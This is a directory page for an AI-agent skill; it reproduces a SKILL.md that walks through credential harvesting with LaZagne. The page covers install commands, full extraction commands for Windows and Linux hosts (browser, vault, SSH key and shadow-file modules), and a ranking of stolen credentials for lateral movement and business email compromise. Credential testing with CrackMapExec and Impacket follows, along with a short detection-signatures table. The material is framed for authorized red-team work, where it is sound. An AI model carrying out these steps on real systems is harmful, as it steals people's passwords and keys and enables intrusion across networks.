Agent skill

Performing Credential Access With Lazagne

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red…

Apache-2.0Auto-check: warningsSecurity

Install Performing Credential Access With Lazagne

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-credential-access-with-lazagne -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-credential-access-with-lazagne --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-credential-access-with-lazagne .claude/skills/performing-credential-access-with-lazagne && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-credential-access-with-lazagne
GitHub stars
34k
Token cost
~2.2k tokens
SKILL.md length
608 words
Files
8 (incl. scripts, references, assets)
Skills in repo
644
Repo updated
First seen
Licence
Apache-2.0

At a glance

Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red…

  • Works in 5 steps: LaZagne Deployment → Full Credential Extraction (Windows) → Credential Extraction (Linux) → …
  • Tasks that involve Red teaming and adversary simulation
  • SKILL.md covers Overview, When to Use, Prerequisites and Objectives, plus 6 more sections
  • Runs Python scripts from its folder; calls python3, git and pip; reaches github.com

What it does

Performing Credential Access With Lazagne is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red team operations.

Its SKILL.md is about 2.2k tokens, which your agent loads only when the skill is triggered. The skill folder holds 10 other files, including scripts, reference files and assets (for example `assets/template.md`, `references/api-reference.md` and `references/standards.md`).

It sits in Security, covering Red teaming and adversary simulation. It works with Linux. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Tasks that involve Red teaming and adversary simulation

Example prompts

  • “/performing-credential-access-with-lazagne”

Requirements

  • Python 3

Workflow steps

5 steps, taken from the step headings in SKILL.md.

  1. LaZagne Deployment
  2. Full Credential Extraction (Windows)
  3. Credential Extraction (Linux)
  4. Credential Analysis and Prioritization
  5. Credential Validation and Use

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 2 files in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • python3
    • git
    • pip

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing Credential Access With Lazagne loads about 2.2k tokens when it runs, and up to ~4.2k if it reads all its reference files. Until then it costs about 64 tokens; SKILL.md has 608 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~64
When it runs · the whole SKILL.md, loaded when a task matches
~2.2k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~4.2k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:246
    | Access to Chrome Login Data SQLite DB | File access monitoring on browser credential stores |

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 608 words, ~2,204 tokens.

Download SKILL.mdSave it as .claude/skills/performing-credential-access-with-lazagne/SKILL.md (or your agent's skills folder). This skill also uses 7 other files; get the full folder from GitHub.
name
performing-credential-access-with-lazagne
description
Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red team operations.
domain
cybersecurity
subdomain
red-teaming
tags
red-team, credential-access, lazagne, post-exploitation, password-recovery, credential-dumping, lateral-movement
version
1.0
author
mahipal
license
Apache-2.0
d3fend_techniques
File Metadata Consistency Validation, Content Format Conversion, File Content Analysis, Platform Hardening, File Format Verification
nist_csf
ID.RA-01, GV.OV-02, DE.AE-07
mitre_attack
T1595, T1190, T1059, T1078, T1021
mitre_f3.version
1.1

Performing Credential Access with LaZagne

Overview

LaZagne is an open-source post-exploitation tool designed to retrieve credentials stored on local systems. It supports Windows, Linux, and macOS, with the most extensive module library for Windows. LaZagne recovers passwords from browsers (Chrome, Firefox, Edge, Opera), email clients (Outlook, Thunderbird), databases (PostgreSQL, MySQL, SQLite), system stores (Windows Credential Manager, LSA secrets, DPAPI), Wi-Fi profiles, Git credentials, and dozens of other applications. The tool is categorized under MITRE ATT&CK T1555 (Credentials from Password Stores) and is listed as software S0349. Red teams use LaZagne after gaining initial access to harvest stored credentials that enable lateral movement and privilege escalation.

When to Use

  • When conducting security assessments that involve performing credential access with lazagne
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Deploy LaZagne on compromised Windows, Linux, or macOS endpoints
  • Extract credentials from all supported password stores
  • Parse and prioritize recovered credentials for lateral movement
  • Identify high-value credentials (domain admin, service accounts, cloud access)
  • Document credential harvesting results with appropriate evidence handling
  • Correlate recovered credentials with BloodHound attack paths

MITRE ATT&CK Mapping

  • T1555 - Credentials from Password Stores
  • T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
  • T1555.004 - Credentials from Password Stores: Windows Credential Manager
  • T1552.001 - Unsecured Credentials: Credentials In Files
  • T1552.002 - Unsecured Credentials: Credentials in Registry
  • T1003.004 - OS Credential Dumping: LSA Secrets
  • T1539 - Steal Web Session Cookie

Workflow

Phase 1: LaZagne Deployment
  1. Transfer LaZagne to the compromised host:
    powershell
    # Pre-compiled executable (Windows)
    # Transfer lazagne.exe via C2 channel or file upload
    
    # Python version (requires Python on target)
    git clone https://github.com/AlessandroZ/LaZagne.git
    cd LaZagne
    pip install -r requirements.txt
  2. Verify execution capability and privileges:
    powershell
    # Check current user context
    whoami /priv
    
    # LaZagne works with standard user privileges for user-level stores
    # SYSTEM/Admin privileges needed for DPAPI master keys, LSA secrets, SAM
Phase 2: Full Credential Extraction (Windows)
  1. Run LaZagne with all modules:
    powershell
    # Extract all credentials
    lazagne.exe all
    
    # Export results to JSON
    lazagne.exe all -oJ
    
    # Export results to specific file
    lazagne.exe all -oJ -output C:\Temp\creds
  2. Run specific modules for targeted extraction:
    powershell
    # Browsers only (Chrome, Firefox, Edge, Opera, IE)
    lazagne.exe browsers
    
    # Windows credential stores
    lazagne.exe windows
    
    # Database credentials
    lazagne.exe databases
    
    # Email client credentials
    lazagne.exe mails
    
    # Wi-Fi passwords
    lazagne.exe wifi
    
    # Git credentials
    lazagne.exe git
    
    # System credentials (requires elevated privileges)
    lazagne.exe sysadmin
Phase 3: Credential Extraction (Linux)
  1. Run LaZagne on Linux targets:
    bash
    # Full extraction
    python3 laZagne.py all
    
    # Browser credentials
    python3 laZagne.py browsers
    
    # System credentials (SSH keys, shadow file with root)
    python3 laZagne.py sysadmin
    
    # Database credentials
    python3 laZagne.py databases
    
    # Git credentials
    python3 laZagne.py git
Show full SKILL.md (336 more words)Show less
Phase 4: Credential Analysis and Prioritization
  1. Parse JSON output for unique credentials:
    python
    import json
    with open("creds.json") as f:
        results = json.load(f)
    for module in results:
        for entry in module.get("results", []):
            print(f"Source: {entry.get('Category')}")
            print(f"  User: {entry.get('Login', 'N/A')}")
            print(f"  URL/Host: {entry.get('URL', entry.get('Host', 'N/A'))}")
  2. Prioritize credentials by value:
    • Domain credentials (AD accounts) for lateral movement
    • Cloud service credentials (AWS, Azure, GCP console)
    • VPN and remote access credentials
    • Database credentials for data access
    • Email credentials for business email compromise
    • Service account credentials for privilege escalation
Phase 5: Credential Validation and Use
  1. Validate recovered domain credentials:
    bash
    # Test domain credentials with CrackMapExec
    crackmapexec smb 10.10.10.0/24 -u recovered_user -p 'recovered_pass'
    
    # Test with Impacket
    smbclient.py domain.local/user:'password'@10.10.10.1
  2. Cross-reference with BloodHound paths for high-value targets
  3. Use recovered credentials for lateral movement or privilege escalation

Tools and Resources

ToolPurposePlatform
LaZagneMulti-source credential extractionWindows/Linux/macOS
MimikatzLSASS/DPAPI credential dumpingWindows
SharpChromeChrome credential extraction (.NET)Windows
SharpDPAPIDPAPI credential decryptionWindows
CrackMapExecCredential validation and sprayingLinux
ImpacketRemote credential testingLinux (Python)

LaZagne Module Coverage (Windows)

CategoryModules
BrowsersChrome, Firefox, Edge, Opera, IE, Brave, Vivaldi
EmailOutlook, Thunderbird, Foxmail
DatabasesPostgreSQL, MySQL, SQLiteDB, Robomongo
SysadminPuTTY, WinSCP, FileZilla, OpenSSH, RDPManager
WindowsCredential Manager, Vault, DPAPI, Autologon
WiFiStored Wi-Fi passwords
GitGit Credential Store, Git Credential Manager
SVNTortoiseSVN
ChatPidgin, Skype

Detection Signatures

IndicatorDetection Method
LaZagne.exe process executionEDR process monitoring with hash-based detection
Access to Chrome Login Data SQLite DBFile access monitoring on browser credential stores
DPAPI CryptUnprotectData API callsAPI hooking and ETW tracing
Access to Windows Credential ManagerEvent 5379 (Credential Manager read)
Mass credential store enumerationBehavioral analysis for sequential access patterns
Python interpreter accessing credential filesScript block logging and file access auditing

Validation Criteria

  • LaZagne deployed on compromised endpoint
  • Full credential extraction completed (all modules)
  • Credentials exported in JSON format for analysis
  • Recovered credentials parsed and deduplicated
  • High-value credentials identified and prioritized
  • Domain credentials validated against AD
  • Lateral movement opportunities identified from recovered creds
  • Evidence documented with appropriate handling procedures

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 7 other files (scripts, references, assets) in skills/performing-credential-access-with-lazagne of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • assets/template.md
  • references/api-reference.md
  • references/standards.md
  • references/workflows.md
  • scripts/agent.py
  • scripts/process.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing Credential Access With Lazagne next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing Credential Access With Lazagne compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing Credential Access With Lazagne this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.2kAutomated safety check: WarnApache-2.0
Rds Db2aws/agent-toolkit-for-aws2.8k—~6.9kAutomated safety check: PassApache-2.0
Game Automationrehan-remade/universal-modder6.5k—~1.9kAutomated safety check: PassMIT
Alibabacloud Ecs Sec Kernelaliyun/alibabacloud-ecs-troubleshoot-skills148—~2.4kAutomated safety check: NotesApache-2.0
Ctf Cryptoljagiello/ctf-skills3.4k—~11kAutomated safety check: NotesMIT
Crypto Bomcdxgen/cdxgen1.1k—~1.4kAutomated safety check: PassApache-2.0

Similar skills

  • Rds Db2

    aws/agent-toolkit-for-aws

    Official

    Provisions, connects, migrates, and operates Amazon RDS for Db2.

    2.8k GitHub stars~6.9k tokensUpdated yesterday
    SecurityAuto-check passed
  • Game Automation

    rehan-remade/universal-modder

    Launch, see and drive a real game so an agent can test its own mods.

    6.5k GitHub stars~1.9k tokensUpdated today
    SecurityAuto-check passed
  • Alibabacloud Ecs Sec Kernel

    aliyun/alibabacloud-ecs-troubleshoot-skills

    Linux 内核态 CVE 漏洞检测与 PoC 验证工具,专为 AI Agent 设计. An agent skill from aliyun/alibabacloud-ecs-troubleshoot-skills.

    148 GitHub stars~2.4k tokensUpdated 1 mo ago
    SecurityAuto-check: notes
  • Ctf Crypto

    ljagiello/ctf-skills

    Provides cryptography attack techniques for CTF challenges. An agent skill from ljagiello/ctf-skills.

    3.4k GitHub stars~11k tokensUpdated 27 days ago
    SecurityAuto-check: notes
  • Crypto Bom

    cdxgen/cdxgen

    Generates a CycloneDX Cryptographic Bill of Materials (CBOM) with the cdxgen cbom command, inventorying cryptographic algorithms, certificates, keys, and protocol usage from source code and hosts…

    1.1k GitHub stars~1.4k tokensUpdated today
    SecurityAuto-check passed
  • App Registration Posture

    SCStelz/security-investigator

    Audit Entra ID app registration and service principal security posture.

    249 GitHub stars~21k tokensUpdated 2 days ago
    SecurityAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 644 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Categories

Questions about Performing Credential Access With Lazagne

What does Performing Credential Access With Lazagne do?

Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red…. Performing Credential Access With Lazagne is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Extract stored credentials from compromised endpoints using the LaZagne post-exploitation tool to recover passwords from browsers, databases, system vaults, and applications during authorized red team operations.

When should I use Performing Credential Access With Lazagne?

Performing Credential Access With Lazagne fits situations like: tasks that involve Red teaming and adversary simulation.

How do I install Performing Credential Access With Lazagne in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-credential-access-with-lazagne -a claude-code`. Or copy the skill folder (skills/performing-credential-access-with-lazagne in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-credential-access-with-lazagne in your project. Claude Code loads it when a task matches its description.

How do I install Performing Credential Access With Lazagne in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-credential-access-with-lazagne -a codex`. Or copy the skill folder (skills/performing-credential-access-with-lazagne in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-credential-access-with-lazagne in your project. Codex loads it when a task matches its description.

Can I use Performing Credential Access With Lazagne in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-credential-access-with-lazagne -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-credential-access-with-lazagne, .gemini/skills/performing-credential-access-with-lazagne, .github/skills/performing-credential-access-with-lazagne and .opencode/skills/performing-credential-access-with-lazagne in your project.

What does Performing Credential Access With Lazagne need to run?

Going by SKILL.md and its folder, Performing Credential Access With Lazagne needs Python for the scripts in its folder and the command-line tools its instructions call (python3, git and pip). Our summary lists: Python 3.

Does Performing Credential Access With Lazagne access the network?

SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.

Is Performing Credential Access With Lazagne safe to install?

Our automated static check of SKILL.md flagged 1 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing Credential Access With Lazagne use?

Performing Credential Access With Lazagne is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing Credential Access With Lazagne use?

About 2.2k tokens (SKILL.md is roughly 8.8k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 2k tokens, read only when the agent opens those files.

What are the alternatives to Performing Credential Access With Lazagne?

Skills that share tags, products or a category with Performing Credential Access With Lazagne: Rds Db2 (aws/agent-toolkit-for-aws, 2.8k stars), Game Automation (rehan-remade/universal-modder, 6.5k stars), Alibabacloud Ecs Sec Kernel (aliyun/alibabacloud-ecs-troubleshoot-skills, 148 stars) and Ctf Crypto (ljagiello/ctf-skills, 3.4k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing Credential Access With Lazagne?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.